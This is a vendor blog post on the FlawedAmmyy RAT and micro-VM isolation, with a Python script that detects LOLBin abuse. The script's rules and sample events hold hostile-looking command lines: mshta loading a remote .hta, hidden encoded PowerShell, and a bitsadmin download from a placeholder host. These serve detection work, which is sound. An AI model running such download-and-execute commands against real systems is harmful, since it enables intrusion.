Protect Before You Detect: FlawedAmmyy and the Case for Isolation
Posted by Ratnesh Pandey, Alex Holland and Toby Gray.
In June 2019, Microsoft issued warnings about a phishing campaign delivering a new variant of the FlawedAmmyy remote access Trojan (RAT), and a spike in the exploitation of CVE-2017-11882 in the wild. In this blog post we take a look at some of the weaknesses of detect-to-protect technologies such as anti-virus, endpoint detection and response (EDR) and anomaly detection systems, and how Bromium’s protect-before-you-detect technology addresses these weaknesses.
With detect-to-protect technologies that rely on signature updates, such as anti-virus, there is a time lag from when novel malware infects a system to when it can be detected because updating and deploying new signatures takes time. This time lag increases the dwell time that the malware is resident on a system, providing a window of opportunity to an adversary to act on their objectives.
Detection using behavioural analytics, as used by EDR, has the same flaw in that these solutions also rely on rule updates. Additionally, to get the best out of EDR, they typically require considerable tuning. Without investing considerable time and effort into creating a baseline of the monitored environment, EDR tools tend to generate a lot of false positives, particularly when trying to detect the malicious use of high-risk living-off-the-land binaries (LOLBins).
Many EDR solutions can contain infected devices from the rest of the network to stop lateral movement, but only after systems have been compromised, meaning that organisations still need to perform expensive eradication and recovery activities. Anomaly detection systems, such as those based on machine learning, also come with the penalty of remediation costs. Remediation can be an expensive affair because of the cost of conducting forensic investigations, rebuilding systems and lost productivity. Often companies spend more on remediation than on the licensing cost of their security solutions.
According to Google Project Zero, it takes 15 days on average for a vendor to patch a zero-day vulnerability that is actively being exploited in the wild. Add to that the 20 days on average it takes for US federal departments to patch critical vulnerabilities and the result is that organisations are exposed to a significant window of vulnerability by zero-day exploits, even with good patch management.
Gartner recognises the value of application isolation to stop breaches. In a 2018 report, Gartner vice president Neil MacDonald argued that isolation and containment technologies are an important part of preventing damage from attacks.
Timeline of events – June 2019
Figure 1 – Timeline of notable security events in June 2019.
Here are a few of the malware trends we have observed in the first half of 2019:
- Downloaders that exploit old Windows vulnerabilities to achieve code execution, particularly CVE-2017-11882, CVE-2017-0199, CVE-2017-8570 and CVE-2018-0802.
- Malware that runs entirely in memory and does not save artefacts to disk (fileless malware).
- Malware that uses LOLBins to perform common malware functionality such as reconnaissance, persistence, and command and control (C2). LOLBins we regularly see include CertUtil, BITSAdmin, MSHTA and PowerShell.
- Malware signed with valid code-signing certificates to reduce the likelihood of being detected. A signed binary with a valid certificate is still treated as a marker of trust. We notice that attackers commonly abuse certificates from two certificate authorities, Thawte and Sectigo.
- Downloaders that check the language of the infected system to determine whether to download a secondary payload. Our colleague, Joe Darbyshire, recently looked at how attackers are using creative ways of determining the language settings of infected systems to target their malware to specific groups of users.
- The growing use of social media as an enabler of cybercrime, providing easy access to hacking tools, tutorials and expertise, including Malware as a Service (MaaS), to anyone willing to pay.
- Malware packed using polymorphic packers, which significantly change the signature of the binary.
One of the most common network security architectures is defence-in-depth (DID). The idea behind DID is to layer different security technologies to defend against common attack vectors, so that attacks missed by one technology are caught by another. There has been some work to measure the effectiveness of any given DID posture by calculating its qualities of depth, width and strength.
However, even after adopting the ideal “deep” and “narrow” DID posture, i.e. a posture that contains many security layers and minimises the number of possible attack paths (attack surface), some attacks still succeed. Additionally, DID is expensive because attack success shares an inverse relationship with the number of heterogeneous technologies (security layers) used to defend a network. Therefore, achieving the most effective DID posture is only realistic for organisations that have security budgets large enough to afford many security technologies. Unfortunately, this means that small and medium-sized enterprises are least likely to benefit from DID.
Bromium’s approach is to reduce the attack surface of the most common attack vectors so that organisations don’t need to increase the number of security layers in their networks to achieve better security. Bromium Secure Platform isolates user tasks on endpoints without disrupting the end user experience. For example, when a user clicks on an attachment containing a Word document, the document is opened inside a micro-VM, which has the same look and feel to the end user and with minimal impact on system performance.
If a document is malicious, it is fully contained in a micro-VM and the host isn’t compromised. Each micro-VM is a replica of an endpoint, created to run a single task. We delete the micro-VM after the task is completed, for instance after closing the Word document. Opening each task in a micro-VM provides an additional benefit of capturing forensic data associated with a threat and provides detailed analysis to help security teams understand the adversary’s intentions by showing what the malware tried to do on the endpoint at the time of execution.
FlawedAmmyy’s Encounter with Bromium
Microsoft alerted the security community to a fresh campaign spreading a new variant of FlawedAmmyy. The variant is notable for running directly in memory and was delivered via an .xls file. But while many people were figuring out how to defend their organisations from this latest variant, for Bromium customers it was just a regular day. Bromium Secure Platform protects against malware from untrusted files (e.g. from email attachments, removable media and downloads from the web) by isolating tasks inside micro-VMs.
Below is the video of the new FlawedAmmyy variant captured by Bromium Secure Platform. Since the malicious .xls file runs in a micro-VM, the host machine is protected from any malicious behaviour caused by opening the file.
Here’s what the video shows:
- Bromium Live View shows a list of active micro-VMs.
- We can see in Live View that the malicious .xls file is opened in a micro-VM.
- When the file is closed the micro-VM is destroyed, along with any malware.
- Forensic information is captured from the threat, including any behaviour mapped to the MITRE ATT&CK framework.
- A detailed view of high severity alerts raised during the lifetime of the micro-VM helps security teams to investigate the actions of the malware so that the motivations of the attacker can be understood.
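The LOLBin trends listed earlier and the ATT&CK-mapped forensic view shown in the video come down to the same analyst question: which process-creation events recorded inside the isolated task deserve attention? The Python script below is an added example written for this post; it is not Bromium's code and not part of the original article. It assumes a simplified tab-separated event format (parent image, child image, command line), and every sample event, the rule set, the severity scheme and the choice of ATT&CK technique IDs are assumptions of this example rather than details taken from the post. The rules flag the well-known abuse patterns of the LOLBins named above (CertUtil, BITSAdmin, MSHTA, PowerShell) and raise severity when the parent is an Office process or another LOLBin, since that chain is what the video's high-severity events describe.

```python
"""Flag LOLBin abuse in process-creation events and map hits to MITRE ATT&CK.

Added example for this post (not Bromium's code). Event format assumed:
one record per line, 'parent<TAB>image<TAB>command line'. Sample events,
rules and severities are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str       # MITRE ATT&CK Enterprise technique ID
    image: str           # lower-case executable name the rule applies to
    pattern: re.Pattern  # searched (case-insensitively) in the command line


# Detection rules for the LOLBins named in the post. Benign uses of the same
# binaries (e.g. 'certutil -verify') deliberately do not match.
RULES = [
    Rule("certutil remote download", "T1105", "certutil.exe",
         re.compile(r"-urlcache\b.*\bhttps?://", re.I)),
    Rule("certutil base64 decode", "T1140", "certutil.exe",
         re.compile(r"-decode\b", re.I)),
    Rule("bitsadmin transfer", "T1197", "bitsadmin.exe",
         re.compile(r"/transfer\b", re.I)),
    Rule("mshta remote script", "T1218.005", "mshta.exe",
         re.compile(r"https?://|javascript:|vbscript:", re.I)),
    Rule("powershell encoded command", "T1059.001", "powershell.exe",
         re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)),
]

# Office processes (eqnedt32.exe is the Equation Editor component abused by
# CVE-2017-11882). None of these should normally spawn scripting or download tools.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}
LOLBINS = {rule.image for rule in RULES}


@dataclass(frozen=True)
class Event:
    parent: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Alert:
    rule: str
    technique: str
    severity: str
    command_line: str


def parse_event(line: str) -> Optional[Event]:
    """Parse one record; return None for blank or malformed lines so a bad
    record cannot abort the whole scan."""
    parts = line.rstrip("\n").split("\t", 2)
    if len(parts) != 3 or not parts[1].strip():
        return None
    parent, image, cmd = parts
    return Event(parent.strip().lower(), image.strip().lower(), cmd.strip())


def evaluate(event: Event) -> List[Alert]:
    """Apply every rule to one event. Severity is 'high' when the parent is an
    Office process or another LOLBin (a chain like Excel -> mshta -> powershell),
    otherwise 'medium'."""
    suspicious_parent = event.parent in OFFICE_PARENTS or event.parent in LOLBINS
    alerts = []
    for rule in RULES:
        if rule.image == event.image and rule.pattern.search(event.command_line):
            severity = "high" if suspicious_parent else "medium"
            alerts.append(Alert(rule.name, rule.technique, severity, event.command_line))
    # An Office process spawning any LOLBin is worth a medium alert even when no
    # command-line rule fires: report it once as User Execution: Malicious File.
    if event.parent in OFFICE_PARENTS and event.image in LOLBINS and not alerts:
        alerts.append(Alert("office spawned lolbin", "T1204.002", "medium", event.command_line))
    return alerts


def scan(lines: Iterable[str]) -> List[Alert]:
    """Scan a sequence of raw event lines and return all alerts in input order."""
    out: List[Alert] = []
    for line in lines:
        event = parse_event(line)
        if event is not None:
            out.extend(evaluate(event))
    return out


# Constructed sample events (hostnames use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    "explorer.exe\tEXCEL.EXE\t\"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\" C:\\Users\\alice\\Downloads\\invoice.xls",
    "EXCEL.EXE\tmshta.exe\tmshta.exe http://example.invalid/loader.hta",
    "mshta.exe\tpowershell.exe\tpowershell.exe -nop -w hidden -enc BASE64PLACEHOLDER",
    "services.exe\tcertutil.exe\tcertutil.exe -verify C:\\certs\\root.cer",
    "WINWORD.EXE\tcertutil.exe\tcertutil.exe -hashfile C:\\Users\\alice\\x.bin SHA256",
    "cmd.exe\tbitsadmin.exe\tbitsadmin.exe /transfer job /download /priority high http://example.invalid/a.bin C:\\Users\\Public\\a.bin",
    "malformed line without tabs",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.severity:6}] {alert.technique:10} {alert.rule}: {alert.command_line}")
```

Running the script on the constructed events yields four alerts: the Excel-to-mshta and mshta-to-PowerShell steps at high severity (T1218.005 and T1059.001), the Word-spawned certutil at medium (T1204.002), and the bitsadmin transfer from cmd.exe at medium (T1197); the benign `certutil -verify` and the malformed record produce nothing. In a real deployment the rule table would be extended from the events the micro-VM records rather than hand-written, and the parent check would walk the full ancestry rather than one level.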
Figure 2 – Demonstration of new FlawedAmmyy variant.
Figure 4 – High severity events raised during infection lifecycle.
Key Benefits of Bromium
- Every Bromium micro-VM is a honeypot that denies adversaries access to the host and their ability to move laterally. The guest mirrors the configuration of the host, using the same operating system, language, timezone, and version of Microsoft Office. This allows micro-VMs to closely mimic how the host would behave if it were compromised, turning them into a tool for deceiving adversaries, but with no risk of data loss. On multiple occasions we have frustrated red team engagements: the red team initially believed that they had compromised a host, only to discover after some frustration that their backdoors had been infecting a disposable micro-VM.
- Users are a weak link in security, and most people don’t understand the dangers lurking behind benign-looking email attachments and hyperlinks. It’s not fair to put the responsibility for attack prevention on the end user. With Bromium, you don’t have to. Every untrusted hyperlink opens in a secure browser tab, each of which is contained within its own micro-VM, removing the guesswork from clicking on hyperlinks and attachments and letting users do their jobs unimpeded.
- Bromium saves organisations the incident response costs associated with containment, eradication and recovery.
Indicators of Compromise (IOCs)